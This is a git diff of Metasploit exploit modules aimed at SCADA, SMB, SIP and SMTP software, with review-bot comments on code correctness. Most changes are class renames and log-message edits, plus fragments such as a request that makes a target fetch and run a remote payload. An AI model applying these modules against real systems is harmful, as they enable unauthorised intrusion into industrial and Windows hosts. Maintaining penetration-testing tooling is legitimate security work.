--- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report @@ -270,7 +270,7 @@ End Sub end def execute_bcl(i) - print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...") + print_status("Executing BCL code #{@basename}#{i}.bcl to drop final payload...") uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe") uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl" @@ -280,12 +280,12 @@ End Sub # We use res.to_s because the embedded CIMPLICITY Web server doesn't # answer with valid HTTP responses. if res and res.code == 200 and res.to_s =~ /(^Error.*$)/ - print_error("#{peer} - Server answered with error: $1") + print_error("Server answered with error: $1") fail_with(Failure::Unknown, "#{peer} - Server answered with error") elsif res and res.code == 200 and res.to_s =~ /No such file or directory/ fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file") elsif res and res.code == 200 - print_good("#{peer} - '200 OK' answer indicates success!") + print_good("'200 OK' answer indicates success!") else fail_with(Failure::Unknown, "#{peer} - Unknown error") end @@ -296,7 +296,7 @@ End Sub execute_bcl(i) end - print_status("#{peer} - Executing #{@exe_filename}...") + print_status("Executing #{@exe_filename}...") uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename) uri << "?" diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 13b9ae70c8..9f51cfa0f8 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb 
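Review bot: In the `@@ -280,12` hunk of ge_proficy_cimplicity_gefebt.rb the changed line `print_error("Server answered with error: $1")` prints the literal text `$1`, because Ruby interpolates a global inside a double-quoted string only when it is written `#$1` or `#{$1}`. The line captured by `res.to_s =~ /(^Error.*$)/` is therefore never shown; `print_error("Server answered with error: #{Regexp.last_match(1)}")` fixes that. The `fail_with` messages in the same hunk keep their `#{peer} - ` prefix while the `print_*` calls drop it, which looks inconsistent if `fail_with` output is prefixed the same way. `execute_bcl` starts in the previous hunk.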
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 76d3ba0e37..9461c4b2e5 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 5e5d0fe856..c107f557ee 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index aa2097f34f..8fd355274a 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 41ba050c1b..0dfcda30ea 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb index ebd1fce53c..6f63c03418 100644 --- a/modules/exploits/windows/scada/igss_exec_17.rb +++ b/modules/exploits/windows/scada/igss_exec_17.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 2c4fa65f6b..99725bef2f 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 9ac1d96811..d416fd0189 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 0c27241964..b999c2608e 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter 
diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index bb08a5045c..0153ee50d5 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index 49bdb98f4c..dfcf1dc520 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 3659a25bcb..2e3d2d7d07 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index 6639e8f9d1..8a4bfd3ca0 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index ae8957925b..2791b5a283 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb 
+++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index 1ea64e355b..4899cb1144 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 4a8e6d2e04..9da0341ab1 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 1360a3e0d3..4002ed40d9 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index 9dc542a090..d7ddb592f7 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb index f77cd30561..9de15b89fe 100644 --- a/modules/exploits/windows/scada/winlog_runtime_2.rb +++ b/modules/exploits/windows/scada/winlog_runtime_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 50988b7a1e..f382fc81ba 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb index 18c48e6ff9..b1bcc632af 100644 --- a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index 5cef7ab51a..47e9e7e78f 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index 4766596f52..a31338f38e 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 12e2bf20af..3802f613ea 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index c26d264abb..20e47d950e 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index ae66736206..1c21d15813 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp 
diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 760bcfd6d2..f52e48a799 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/group_policy_startup.rb b/modules/exploits/windows/smb/group_policy_startup.rb index 8157d00f14..9be37de7e0 100644 --- a/modules/exploits/windows/smb/group_policy_startup.rb +++ b/modules/exploits/windows/smb/group_policy_startup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 67eaa9baf9..953fa13ed8 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 2b1c6f7272..985fd2cbd7 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC 
diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 817f32c8d2..2a8565ddab 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 8c9150e72f..e2c4864fda 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 63bb2284c4..30f78db495 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index c607558b2b..1e15f4dbe4 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index ad523283c1..e62d26a6c1 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 73bf7bd392..540a4b7b6f 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 335165a58d..a5f6e127f5 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 17b58d9077..59ddf4c93b 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index e5104d14c2..c081217b06 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC 
diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 059ff04131..5d3cd7763f 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Requires valid/working DOMAIN + DC include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 651de13296..c81a58727b 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index a1e8de1191..f0523cc5aa 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC @@ -879,7 +879,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Windows 2003 SP0 is mostly universal - if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack' + if fprint['os'] == 'Windows 2003' and fprint['sp'].empty? mytarget = targets[3] end diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 3cf78788c9..f8e71f3b7e 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb 
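Review bot: In the `@@ -879,7 +879,7 @@` hunk of ms08_067_netapi.rb, `fprint['sp'].empty?` raises NoMethodError when the fingerprint hash carries no 'sp' value, whereas the string comparison it replaces simply evaluated to false. Whether 'sp' can be nil is not visible in this hunk, so a form that keeps the old tolerance is safer: `if fprint['os'] == 'Windows 2003' and fprint['sp'] == ''`. If an empty string is now the convention for "no service pack", a short comment saying so above the condition would help the next reader, since the existing comment only says "SP0". The enclosing method starts and ends outside the hunk.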
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 7afff33985..db5fdcb58e 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index b1b688e620..69ce351e30 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/windows_error' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 780604be72..9aa9a57d6e 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index b9c0a1baea..8796ac8402 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 362dd6e87d..d9a46e9b37 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin psexec(command) rescue StandardError => exec_command_error diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 0c45d00c83..1c912acdfa 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Exploit mixins should be called first @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Module::Deprecated - deprecated(Date.new(2016, 1, 1), 'exploit/windows/smb/psexec') + deprecated(Date.new(2016, 4, 30), 'exploit/windows/smb/psexec') def initialize(info = {}) super(update_info(info, @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin return psexec(command) rescue StandardError => exec_command_error 
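Review bot: The status line in the `@@ -171,7 +171,7 @@` hunk of psexec.rb, and the same line in the `@@ -90,7 +90,7 @@` hunk of psexec_psh.rb, no longer names the host, while the `fail_with` call directly above it in psexec_psh.rb still interpolates `#{peer}` by hand. These hunks do not show whether `print_status` now prepends the peer itself. If it does, a one-line comment such as `# peer is prepended by print_status` would explain why the two calls differ. If it does not, log lines from a run against several hosts can no longer be attributed to one of them. Both methods start and end outside the hunks.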
diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 869aa183ff..8f97d7ca0c 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -19,7 +19,7 @@ under: require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Server diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index ceea4829b0..c7f1e9259d 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 07925d6526..05e183e82e 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 27ac045d5b..36eba8502e 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 3fbf61a555..d045492849 100644 
